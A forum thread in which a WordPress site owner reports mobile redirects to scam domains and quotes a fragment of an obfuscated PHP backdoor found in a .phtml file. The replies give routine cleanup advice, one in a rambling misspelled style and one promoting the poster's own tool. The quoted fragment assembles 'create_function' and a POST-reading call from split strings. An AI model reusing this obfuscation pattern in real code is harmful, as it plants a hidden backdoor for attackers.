I got a "happy letter" from Google, saying my site is a threat to users, so I went to check in Google Webmaster and found a critical issue:

The site uses methods that mislead mobile internet users – for example, it replaces the content indexed by the search robot and/or redirects visitors to pages with subscriptions to paid content services.

I reached out to support, and they told me that sometimes the mobile version of the site redirects to scammy sites, and I need to fix it. If everything's ok in 2-3 months, they'll lift the restrictions.

After trying some queries that lead to my site in search, I eventually managed to catch a redirect:

w3-org.cc --- bestprizes-box.life --- givemelove17.live --- mobile-app-market-here1.life --- adaranth.com --- extraordinaryprizes.com

Sometimes you go in, and next time, there's a different redirect:

bestdealfor1.life ---- e.bestdealfor1.life --- f.bestdealfor1.life --- g.bestdealfor1.life ---- h.bestdealfor1.life ---- secure.umredirect.com ---- tropd.com

There are other chains of sites as well.

I also caught something similar on 4 more of my sites (maybe it's not the end).

I used the built-in AI-Bolit antivirus on my hosting and found the following on many sites:

/wp-includes/js/tinymce/langs/77711746.phtml

with the following malicious code:

cution_time',0);ini_set('display_errors',0);error_reporting(0);set_time_limit(0);$cret='unction';$cret='create_f'.$cret; $jQuery='sert';$jQuery='as'.$jQuery;$Libr="_ostp";$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3]);if(iss

I deleted this file everywhere; there were also some other strange files in the folder (which weren't on those sites where this script wasn't found). I deleted them too.

Thinking I fixed the redirect issue, I wrote to Google and got a standard reply that if everything's fine, the mark will be removed in 2-3 months...

Now, I've found out that the redirect hasn't gone away. Can anyone explain what the cause might be? Do I understand correctly that the reason isn't in this malicious code I found? Or is it in that, but I missed something when deleting?

The fact that you still experiencing the redirects even after deleting the malicious files indicates that the root of the problem hasn't been fully resolved. It's possible that the malicious code is still hiding somewhere on your site, or even on your server. Attackers often plant backdoors in various locations, which allows them to regain access even after you remove the initial malware.

Here's a few steps you should take to try and get to the bottom of it:

Check all site files: The code you found in /wp-includes/js/tinymce/langs/77711746.phtml is just one part of the puzzle. Hackers might have added similar files in other directories as well, or even modified existing files. You'll want to thoroughly check all your directories, especially in places like /wp-content/uploads/, /wp-includes/, and even your theme and plugin directories.

Inspect the database: Sometimes, malicious code is injected into the database. Check for any unusual records in the wp_options, wp_posts, and wp_usermeta tables, as these are common targets. Look for strange URLs, base64 encoded strings, or any other code that looks out of place.

Check .htaccess file: Hackers often use the .htaccess file to set up redirects. Make sure to check it for any suspicious rules or redirects that shouldn't be there. If you find anything fishy, remove it, but make sure to take a backup first.

Update everything: Ensure that your WordPress installation, plugins, themes, and even your server software are up-to-date. Many hacks exploit known vulnerabilities that are fixed in later updates. If you have outdated software, it's an open door for attackers.

Change passwords: Change all your passwords, including your WordPress admin, FTP, database, and hosting account. Use strong, unique passwords for each.

Scan for backdoors: It's possible that the hackers have installed backdoors that allow them to regain access after you've cleaned your site. You might need a more robust scanner than AI-Bolit to find these. Tools like Wordfence or Sucuri can help scan for and remove backdoors.

Check server logs: Review your server logs to see if you can spot any unusual activity that might give you clues about how the site was compromised. Look for strange IPs, unexpected POST requests, or any scripts being called that shouldn't be.

Consider a full reinstall: If you continue to find issues, it might be best to take the nuclear option. Backup your site content, and do a full reinstall of WordPress. Re-upload clean copies of your theme and plugins, and restore your content from backup. This is often the safest way to ensure all malware is gone.

The fact that the redirect hasn't gone away suggests that there's still some malicious code left, or that a backdoor is allowing the attacker to reinsert the code. The file you found is just one of the symptoms, not necessarily the root cause. You might have missed something or, more likely, the hacker has multiple entry points.
You're probably dealing with more than just the one malicious file you found. Hackers often leave several layers of infection to maintain control over a site. Follow the steps above to thoroughly clean your site and prevent further issues.

Like, the redirect thingy, it might stil be ther, maybe its just stuck in your computr cache or somethin. Or maybe it didnt actualy go eniwhere, its just hidin. You can chek if the file is stil ther, or maybe the site got re-infekted, like, in the same spot or somwhere els.

Or, you know, maybe its somethin els entirely...

Anyway, its hard to say w/o takin a closer look, like, examinin the patient, or in this case, the site. You gotta dig deeper, like, chek the logs, and the files, and all that jazz. Its like, a mystery, and you gotta solve it, or else the problem will just keep comin back, like a bad penny.

And, btw, its always a good idear to keep your site and computr up to date, like, with the latest security patches and all that. Its like, a good way to prevent this kinda thing from happnin in the first place.

Make sure to update all of your scripts. This means removing any old or potentially compromised files, and then uploading fresh, clean versions of WordPress scripts and plugins. This step ensures that no remnants of old, vulnerable code remain on your server.

Next, monitor your logs closely. Look for any unusual activity that could indicate an attempt to upload a malicious shell. By reviewing these logs, you can identify which scripts were accessed and pinpoint any suspicious behavior.

Consider implementing an antibot tool, as suggested in my profile. If an attacker tries to access the WordPress configuration file (where the antibot settings are included), you'll be able to see these attempts in the antibot logs. This can help you catch and block malicious requests. However, if the attacker targets a specific plugin with known vulnerabilities, the antibot might not be effective, as it primarily guards against general bot activity rather than specific script exploits.

Adding an additional layer of security, such as regularly scanning for vulnerabilities and applying patches, can further strengthen your defenses against such attacks.